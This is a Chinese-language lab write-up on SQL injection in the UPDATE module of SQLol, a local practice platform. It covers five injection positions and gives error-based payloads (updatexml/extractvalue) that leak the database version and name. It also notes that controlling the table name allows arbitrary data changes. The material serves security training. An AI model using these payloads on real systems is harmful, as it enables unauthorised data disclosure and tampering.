SQL注入测试平台 SQLol -4.UPDATE注入测试

简介:   访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试。 update语法: UPDATE 【users】 SET 【username】 = 【'haxotron9000'】 WHERE username = 【'1'】 接收的参数可能拼接到上述语句中【】的任一个位置,4个位置,共有5种不同的类型。

  访问首页的update模块http://127.0.0.1/sql/update.php,开始对update模块进行测试。

update语法:

 UPDATE 【users】 SET 【username】 = 【'haxotron9000'】 WHERE username = 【'1'】 

接收的参数可能拼接到上述语句中【】的任一个位置,4个位置,共有5种不同的类型。下面开始演示: 

 

一、String in WHERE clause

构造POC:

' or updatexml(1,concat(0x7e,(version()),0x7e),0) or'

如下图,获取数据库版本  

二、Integer in WHERE Clause

构造POC:

1 or extractvalue(1,concat(0x7e,database())) or''

如下图,获取数据库版本

三、Column Name

注入点在【1】处,

UPDATE users SET 【1】 = 'haxotron9000' WHERE isadmin = 0 

能想到的利用方式有两种:

1、注释掉后面的语句,自由构造报错语句进行执行

2、更改users表中的用户数据

POC:

UPDATE users SET id=1 or extractvalue(1,concat(0x7e,database()))

  

四、Table Name

注入点在【1】处

 UPDATE 【1】 SET username = 'haxotron9000' WHERE isadmin = 0 

我们如何来利用呢?

1、表名可以自己控制,在知道某表某列的情况下,就可以自由更改数据啦。

2、构造报错注入,与上一个类似。

 

五、Value to write

注入点在【1】处

UPDATE users SET username =【 '1'】 WHERE isadmin = 0 

构造POC:

UPDATE users SET username = '1' or extractvalue(1,concat(0x7e,database()))#

 

似乎没什么新意,也就这几种方法在切换,以后想到别的方法再来更新吧

目录
相关文章
|
1月前
|
SQL 监控 安全
SQL注入的实现原理以及防止
SQL注入的实现原理以及防止
|
2月前
|
SQL 数据库
20、绕过去除and、or、union select、空格的sql注入
20、绕过去除and、or、union select、空格的sql注入
31 0
|
2月前
|
SQL 数据库
小课堂 -- 绕过去除特殊字符的sql注入
小课堂 -- 绕过去除特殊字符的sql注入
22 0
|
2月前
|
SQL Java 数据库连接
[SQL]SQL注入与SQL执行过程(基于JDBC)
[SQL]SQL注入与SQL执行过程(基于JDBC)
50 0
|
1月前
|
SQL Java 应用服务中间件
Java项目防止SQL注入的四种方案
Java项目防止SQL注入的四种方案
38 0
|
2月前
|
SQL 安全 关系型数据库
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞
接上篇文章,在测试宝塔 WAF 的未授权访问漏洞时无意间还发现了一个 SQL 注入漏洞,品相还不错,可执行任意 SQL 语句。 总之,吃了一惊,一个防 SQL 注入的工具居然也有 SQL 注入漏洞。 请看这段代码
414 1
|
1月前
|
SQL 存储 关系型数据库
SQL的基本语法以及SQL语句的关键字的使用,SELECT、INSERT、UPDATE、DELETE、CREATE、ALTER、DROP等。
SQL的基本语法以及SQL语句的关键字的使用,SELECT、INSERT、UPDATE、DELETE、CREATE、ALTER、DROP等。
|
5天前
|
SQL 安全 Go
如何在 Python 中进行 Web 应用程序的安全性管理,例如防止 SQL 注入?
在Python Web开发中,确保应用安全至关重要,主要防范SQL注入、XSS和CSRF攻击。措施包括:使用参数化查询或ORM防止SQL注入;过滤与转义用户输入抵御XSS;添加CSRF令牌抵挡CSRF;启用HTTPS保障数据传输安全;实现强身份验证和授权系统;智能处理错误信息;定期更新及审计以修复漏洞;严格输入验证;并培训开发者提升安全意识。持续关注和改进是保证安全的关键。
12 0
|
13天前
|
SQL 安全 PHP
CTF--Web安全--SQL注入之Post-Union注入
CTF--Web安全--SQL注入之Post-Union注入
|
1月前
|
缓存 运维 Serverless
应用研发平台EMAS产品常见问题之测试检查更新没有反应如何解决
应用研发平台EMAS(Enterprise Mobile Application Service)是阿里云提供的一个全栈移动应用开发平台,集成了应用开发、测试、部署、监控和运营服务;本合集旨在总结EMAS产品在应用开发和运维过程中的常见问题及解决方案,助力开发者和企业高效解决技术难题,加速移动应用的上线和稳定运行。